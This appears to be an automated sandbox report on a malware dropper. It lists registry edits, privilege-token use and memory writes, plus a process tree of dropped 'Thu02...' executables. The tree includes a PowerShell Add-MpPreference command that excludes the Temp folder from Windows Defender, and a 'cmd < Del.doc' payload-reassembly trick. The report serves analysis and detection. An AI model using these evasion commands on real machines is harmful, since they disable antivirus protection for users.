description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5428 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5320 WerFault.exe 5320 WerFault.exe 5244 WerFault.exe 5244 WerFault.exe 5048 WerFault.exe 5048 WerFault.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 1260 Thu02d385ff55.exe 6128 gcleaner.exe 6128 gcleaner.exe 6096 vsvchNX79eSDzY6jf6F89_MI.exe 6096 vsvchNX79eSDzY6jf6F89_MI.exe 6120 4UFxWlf4SXw8gZe000f3mxr3.exe 6120 4UFxWlf4SXw8gZe000f3mxr3.exe 5092 H6KBNe4YRhkCjXl_yzSBZb2I.exe 5092 H6KBNe4YRhkCjXl_yzSBZb2I.exe 6136 vefp3cTczsHP35rf3STZwLUJ.exe 6136 vefp3cTczsHP35rf3STZwLUJ.exe 5564 byxb49tCEP1SdejWYr15WvcH.exe 5564 byxb49tCEP1SdejWYr15WvcH.exe 5112 2841347.scr 5112 2841347.scr 5396 210921.exe 5396 210921.exe 4892 powershell.exe 4892 powershell.exe 6024 269new.exe 6024 269new.exe 2028 WerFault.exe 2028 WerFault.exe 4432 AdvancedRun.exe 4432 AdvancedRun.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3208 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 5112 2841347.scr 4588 E804.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2548 Thu02c015332704.exe Token: SeDebugPrivilege 4644 Thu02f60acc90a3.exe Token: SeRestorePrivilege 5048 WerFault.exe Token: SeBackupPrivilege 5048 WerFault.exe Token: SeBackupPrivilege 5048 WerFault.exe Token: SeCreateTokenPrivilege 5244 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 5244 msiexec.exe Token: SeLockMemoryPrivilege 5244 msiexec.exe Token: SeIncreaseQuotaPrivilege 5244 msiexec.exe Token: SeMachineAccountPrivilege 5244 msiexec.exe Token: SeTcbPrivilege 5244 msiexec.exe Token: SeSecurityPrivilege 5244 msiexec.exe Token: SeTakeOwnershipPrivilege 5244 msiexec.exe Token: SeLoadDriverPrivilege 5244 msiexec.exe Token: SeSystemProfilePrivilege 5244 msiexec.exe Token: SeSystemtimePrivilege 5244 msiexec.exe Token: SeProfSingleProcessPrivilege 5244 msiexec.exe Token: SeIncBasePriorityPrivilege 5244 msiexec.exe Token: SeCreatePagefilePrivilege 5244 msiexec.exe Token: SeCreatePermanentPrivilege 5244 msiexec.exe Token: SeBackupPrivilege 5244 msiexec.exe Token: SeRestorePrivilege 5244 msiexec.exe Token: SeShutdownPrivilege 5244 msiexec.exe Token: SeDebugPrivilege 5244 msiexec.exe Token: SeAuditPrivilege 5244 msiexec.exe Token: SeSystemEnvironmentPrivilege 5244 msiexec.exe Token: SeChangeNotifyPrivilege 5244 msiexec.exe Token: SeRemoteShutdownPrivilege 5244 msiexec.exe Token: SeUndockPrivilege 5244 msiexec.exe Token: SeSyncAgentPrivilege 5244 msiexec.exe Token: SeEnableDelegationPrivilege 5244 msiexec.exe Token: SeManageVolumePrivilege 5244 msiexec.exe Token: SeImpersonatePrivilege 5244 msiexec.exe Token: SeCreateGlobalPrivilege 5244 msiexec.exe Token: 31 5244 msiexec.exe Token: 32 5244 msiexec.exe Token: 33 5244 msiexec.exe Token: 34 5244 msiexec.exe Token: 35 5244 msiexec.exe Token: SeDebugPrivilege 864 A5SgmahwE9hpMlGs6aKgdDtn.exe Token: SeDebugPrivilege 1868 oKmnOrVPGDoDvSbzfd3Aw8I1.exe Token: SeDebugPrivilege 4432 AdvancedRun.exe Token: SeDebugPrivilege 4892 powershell.exe Token: SeImpersonatePrivilege 4432 AdvancedRun.exe Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeTcbPrivilege 6000 svchost.exe Token: SeTcbPrivilege 6000 svchost.exe Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found -
Suspicious use of FindShellTrayWindow 12 IoCs
pid Process 5400 Riconobbe.exe.com 5400 Riconobbe.exe.com 5400 Riconobbe.exe.com 5476 Riconobbe.exe.com 5476 Riconobbe.exe.com 5476 Riconobbe.exe.com 16248 installer.exe 5324 msedge.exe 14864 msiexec.exe 14864 msiexec.exe 15464 5794.tmp 6448 main_signed1.tmp -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 5400 Riconobbe.exe.com 5400 Riconobbe.exe.com 5400 Riconobbe.exe.com 5476 Riconobbe.exe.com 5476 Riconobbe.exe.com 5476 Riconobbe.exe.com -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5048 jDVhr13u5N750xam3eOI1eNW.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3208 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3932 wrote to memory of 4344 3932 071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe 78 PID 3932 wrote to memory of 4344 3932 071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe 78 PID 3932 wrote to memory of 4344 3932 071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe 78 PID 4344 wrote to memory of 4588 4344 setup_install.exe 82 PID 4344 wrote to memory of 4588 4344 setup_install.exe 82 PID 4344 wrote to memory of 4588 4344 setup_install.exe 82 PID 4344 wrote to memory of 4712 4344 setup_install.exe 83 PID 4344 wrote to memory of 4712 4344 setup_install.exe 83 PID 4344 wrote to memory of 4712 4344 setup_install.exe 83 PID 4344 wrote to memory of 4252 4344 setup_install.exe 84 PID 4344 wrote to memory of 4252 4344 setup_install.exe 84 PID 4344 wrote to memory of 4252 4344 setup_install.exe 84 PID 4344 wrote to memory of 4256 4344 setup_install.exe 85 PID 4344 wrote to memory of 4256 4344 setup_install.exe 85 PID 4344 wrote to memory of 4256 4344 setup_install.exe 85 PID 4344 wrote to memory of 3012 4344 setup_install.exe 86 PID 4344 wrote to memory of 3012 4344 setup_install.exe 86 PID 4344 wrote to memory of 3012 4344 setup_install.exe 86 PID 4344 wrote to memory of 5028 4344 setup_install.exe 87 PID 4344 wrote to memory of 5028 4344 setup_install.exe 87 PID 4344 wrote to memory of 5028 4344 setup_install.exe 87 PID 4344 wrote to memory of 5044 4344 setup_install.exe 101 PID 4344 wrote to memory of 5044 4344 setup_install.exe 101 PID 4344 wrote to memory of 5044 4344 setup_install.exe 101 PID 4344 wrote to memory of 4796 4344 setup_install.exe 88 PID 4344 wrote to memory of 4796 4344 setup_install.exe 88 PID 4344 wrote to memory of 4796 4344 setup_install.exe 88 PID 4344 wrote to memory of 4892 4344 setup_install.exe 89 PID 4344 wrote to memory of 4892 4344 setup_install.exe 89 PID 4344 wrote to memory of 4892 4344 setup_install.exe 89 PID 4256 wrote to memory of 3256 4256 cmd.exe 99 PID 4256 wrote to memory of 3256 4256 cmd.exe 99 PID 4344 wrote to memory of 868 4344 setup_install.exe 98 PID 4344 wrote to memory of 868 4344 setup_install.exe 98 PID 4344 wrote to memory of 868 4344 setup_install.exe 98 PID 4712 wrote to memory of 784 4712 cmd.exe 90 PID 4712 wrote to memory of 784 4712 cmd.exe 90 PID 4712 wrote to memory of 784 4712 cmd.exe 90 PID 4588 wrote to memory of 4380 4588 cmd.exe 97 PID 4588 wrote to memory of 4380 4588 cmd.exe 97 PID 4588 wrote to memory of 4380 4588 cmd.exe 97 PID 4252 wrote to memory of 4544 4252 cmd.exe 96 PID 4252 wrote to memory of 4544 4252 cmd.exe 96 PID 4252 wrote to memory of 4544 4252 cmd.exe 96 PID 5044 wrote to memory of 1260 5044 cmd.exe 95 PID 5044 wrote to memory of 1260 5044 cmd.exe 95 PID 5044 wrote to memory of 1260 5044 cmd.exe 95 PID 3012 wrote to memory of 1288 3012 cmd.exe 92 PID 3012 wrote to memory of 1288 3012 cmd.exe 92 PID 3012 wrote to memory of 1288 3012 cmd.exe 92 PID 5028 wrote to memory of 3872 5028 cmd.exe 91 PID 5028 wrote to memory of 3872 5028 cmd.exe 91 PID 5028 wrote to memory of 3872 5028 cmd.exe 91 PID 4796 wrote to memory of 4644 4796 cmd.exe 93 PID 4796 wrote to memory of 4644 4796 cmd.exe 93 PID 868 wrote to memory of 2548 868 cmd.exe 100 PID 868 wrote to memory of 2548 868 cmd.exe 100 PID 4892 wrote to memory of 4652 4892 cmd.exe 94 PID 4892 wrote to memory of 4652 4892 cmd.exe 94 PID 4892 wrote to memory of 4652 4892 cmd.exe 94 PID 784 wrote to memory of 4812 784 Thu0247e977c7950492a.exe 103 PID 784 wrote to memory of 4812 784 Thu0247e977c7950492a.exe 103 PID 784 wrote to memory of 4812 784 Thu0247e977c7950492a.exe 103 PID 4652 wrote to memory of 3900 4652 Thu02bfe1521bcc038.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe"C:\Users\Admin\AppData\Local\Temp\071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:4380
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0247e977c7950492a.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu0247e977c7950492a.exeThu0247e977c7950492a.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu0247e977c7950492a.exe"C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu0247e977c7950492a.exe" -a5⤵
- Executes dropped EXE
PID:4812
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0299d0d70a4d322.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4252 -
C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu0299d0d70a4d322.exeThu0299d0d70a4d322.exe4⤵
- Executes dropped EXE
PID:4544 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 2405⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5244
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02483b39590da5492.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4256 -
C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu02483b39590da5492.exeThu02483b39590da5492.exe4⤵
- Executes dropped EXE
PID:3256
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02966ca5c58f270.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu02966ca5c58f270.exeThu02966ca5c58f270.exe4⤵
- Executes dropped EXE
PID:1288 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1288 -s 2405⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5320
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02588bdad8e7.exe3⤵
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu02588bdad8e7.exeThu02588bdad8e7.exe4⤵
- Executes dropped EXE
PID:3872 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 3165⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5048
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02f60acc90a3.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu02f60acc90a3.exeThu02f60acc90a3.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02bfe1521bcc038.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu02bfe1521bcc038.exeThu02bfe1521bcc038.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Windows\SysWOW64\dllhost.exedllhost.exe5⤵PID:3900
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Del.doc5⤵PID:4604
-
C:\Windows\SysWOW64\cmd.execmd6⤵PID:5264
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^NZrkFJTgsCdMvCokxiUUxUBYmGUZCyshQzrAfUxHKQBByATJNifzJsTTnyLZOTMjkrVrmIWmMjlEaZSZNkkcPXDmmpwppcSQtfd$" Una.doc7⤵PID:5348
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.comRiconobbe.exe.com H7⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5400 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.com H8⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5476
-
-
-
C:\Windows\SysWOW64\PING.EXEping YJTUIPJF -n 307⤵
- Runs ping.exe
PID:5428
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02c015332704.exe3⤵
- Suspicious use of WriteProcessMemory
PID:868 -
C:\Users\Admin\AppData\Local\Temp\7zSC5FAF990\Thu02c015332704.exeThu02c015332704.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2548
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02d385ff55.exe3⤵
- Suspicious use of WriteProcessMemory
PID:5044
-
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv lX+JvkxKV0GZd+6TsanO5Q.0.21⤵
- Modifies data under HKEY_USERS
PID:4780
-
